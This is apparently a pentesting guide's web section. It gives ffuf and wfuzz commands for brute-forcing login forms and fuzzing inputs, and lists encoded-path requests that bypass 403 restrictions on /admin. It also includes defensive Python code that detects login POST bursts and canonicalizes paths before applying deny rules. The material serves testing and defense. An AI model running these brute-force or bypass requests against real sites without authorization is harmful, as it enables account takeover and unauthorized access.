The Pentesting Guide

WEB

Last updated 5 months ago

Introduction

Websites today are built from many technologies: databases, web development frameworks, programming languages, APIs, data formats, protocols and browsers. Each of them has its own specific vulnerabilities that developers should be aware of, which is not always the case, as the OWASP Top Ten shows.

This section covers several vulnerabilities worth checking whenever you perform a web penetration test.

Form fuzzing

During a web vulnerability assessment, the target will almost always have one or more forms that POST user-supplied data to the server.

Fuzzing those forms can let you brute-force credentials or discover vulnerabilities such as SSTI, SQLi and XSS.

ffuf -w "./usuarios.txt:USERS" -w "./wordlist.txt:PASSWDS" -t 60 -u http://<URL>/login -H "Content-Type: application/json;charset=utf-8" -X POST -d '{"username":"USERS","password":"PASSWDS"}'

You may also need to encode the payloads (URL encoding, base64, etc.) before they are sent to the server. Use wfuzz for that, since ffuf does not support payload encoding.

wfuzz -u http://<URL>/search -H 'Content-Type: application/x-www-form-urlencoded' -X POST -d 'name=FUZZ' -z file,/usr/share/wordlists/SecLists/Fuzzing/special-chars.txt,urlencode
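From the defender's side, a run like the ffuf and wfuzz commands above is loud in the access log: many POSTs to a single form from one client in a short window, most of them rejected. The following is an added example, not part of this guide, that parses constructed combined-format access log lines and flags clients that exceed a POST rate against a form. The log lines, the client addresses, the 60-second sliding window and the threshold of 20 requests are all assumptions chosen for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Subset of the Apache/nginx combined log format: client IP, timestamp,
# request line and status code are all this detector needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # ignore the query string
        "status": int(m["status"]),
    }


def find_form_bursts(lines, path="/login", window=timedelta(seconds=60), threshold=20):
    """Return {ip: info} for clients that POSTed to `path` at least
    `threshold` times inside any sliding window of length `window`
    (assumed defaults; tune them to the form being protected)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            per_ip[rec["ip"]].append(rec)

    alerts = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end, rec in enumerate(recs):
            # Advance the window start until the window fits inside `window`.
            while rec["ts"] - recs[start]["ts"] > window:
                start += 1
            in_window = recs[start:end + 1]
            if len(in_window) >= threshold:
                failures = sum(r["status"] in (401, 403) for r in in_window)
                current = alerts.get(ip)
                if current is None or len(in_window) > current["posts"]:
                    alerts[ip] = {
                        "posts": len(in_window),
                        "failures": failures,
                        "window_end": rec["ts"],
                    }
    return alerts


def make_sample_log():
    """Constructed sample log (not real traffic): 203.0.113.7 sends 25 POSTs
    to /login in 48 seconds, all rejected; 198.51.100.4 logs in normally."""
    base = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "POST /login HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'
    lines = []
    for i in range(25):
        ts = (base + timedelta(seconds=2 * i)).strftime(TS_FMT)
        lines.append(fmt.format(ip="203.0.113.7", ts=ts, status=401))
    for i, status in enumerate((401, 401, 200)):
        ts = (base + timedelta(minutes=5 * i)).strftime(TS_FMT)
        lines.append(fmt.format(ip="198.51.100.4", ts=ts, status=status))
    return lines


if __name__ == "__main__":
    for ip, info in find_form_bursts(make_sample_log()).items():
        print(f"{ip}: {info['posts']} POSTs to /login, {info['failures']} rejected, "
              f"window ending {info['window_end'].isoformat()}")
```

The failure count is reported alongside the raw rate because a burst of successful POSTs (a batch import, a load test) looks very different from a burst of 401s, and the second is what a credential or payload fuzzing run against a login form produces.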

Bypass Forbidden

If the web server, or a reverse proxy or WAF in front of it, is misconfigured, you can try several techniques and tools to bypass its filters. A path-based deny rule can often be bypassed by requesting the same resource through a differently encoded path, because the component that enforces the rule and the application that serves the resource may normalise the path differently:

GET /admin ==> 403 Forbidden
GET /blablabal/%2e%2e/admin ==> 200 OK
GET /blablabal/..;/admin ==> 200 OK
GET /blablabal/;/admin ==> 200 OK
GET /blablabal/admin/..;/ ==> 200 OK
GET /admin?access=1 ==> 200 OK
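The requests above succeed when the component enforcing the deny rule compares the path exactly as it arrived, while the application server behind it percent-decodes, strips `;` path parameters and resolves `..` before routing, so the two disagree about what `/blablabal/..;/admin` refers to. The following is an added example, not from this guide, that contrasts a naive prefix rule with one that canonicalizes the path first; it approximates a servlet container's normalisation rather than reproducing any particular server. The `/admin` prefix, the double-encoded variant and the order of the normalisation steps are assumptions. Real servers differ in the details, which is why the durable fix is to enforce authorization inside the application rather than in a front-end path filter.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Assumed protected prefix; the guide's example denies /admin.
PROTECTED = "/admin"


def _under_protected(path):
    return path == PROTECTED or path.startswith(PROTECTED + "/")


def naive_is_blocked(raw_url):
    """Front-end style rule that compares the path exactly as it arrived."""
    return _under_protected(urlsplit(raw_url).path)


def canonicalize(raw_url):
    """Approximate what an application server does to a path before routing
    (assumed model; individual servers vary in these steps and their order)."""
    path = urlsplit(raw_url).path
    # 1. Percent-decode until the result stops changing, so a double-encoded
    #    %252e%252e collapses the same way a single %2e%2e does.
    decoded = unquote(path)
    while decoded != path:
        path, decoded = decoded, unquote(decoded)
    # 2. Drop ';param' path parameters from every segment; servlet containers
    #    ignore them when matching, so a '..;' segment behaves like '..'.
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    # 3. Resolve '.', '..' and repeated slashes; '..' above the root is dropped.
    return posixpath.normpath("/" + path.lstrip("/"))


def hardened_is_blocked(raw_url):
    """Canonicalize first, then apply the same prefix rule."""
    return _under_protected(canonicalize(raw_url))


def compare(raw_url):
    """Show how the two rules disagree for one request path."""
    return {
        "raw": raw_url,
        "canonical": canonicalize(raw_url),
        "naive_blocked": naive_is_blocked(raw_url),
        "hardened_blocked": hardened_is_blocked(raw_url),
    }


if __name__ == "__main__":
    for url in ("/admin", "/blablabal/%2e%2e/admin", "/blablabal/..;/admin",
                "/%252e%252e/admin", "/admin;x=1", "/public/index.html"):
        print(compare(url))
```

Note that `/admin?access=1` is blocked by both rules here: that case is an application logic flaw (a query parameter that short-circuits the access check), not a normalisation mismatch, and no path filter can fix it.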

There are several tools that you can use to try to bypass such filters:

bypass-url-parser
dontgo403
forbidden
byp4xx

Note: If you want to try all of them at the same time, you can use 403bypasser_installer.sh to install the tools and 403bypasser.sh to run them.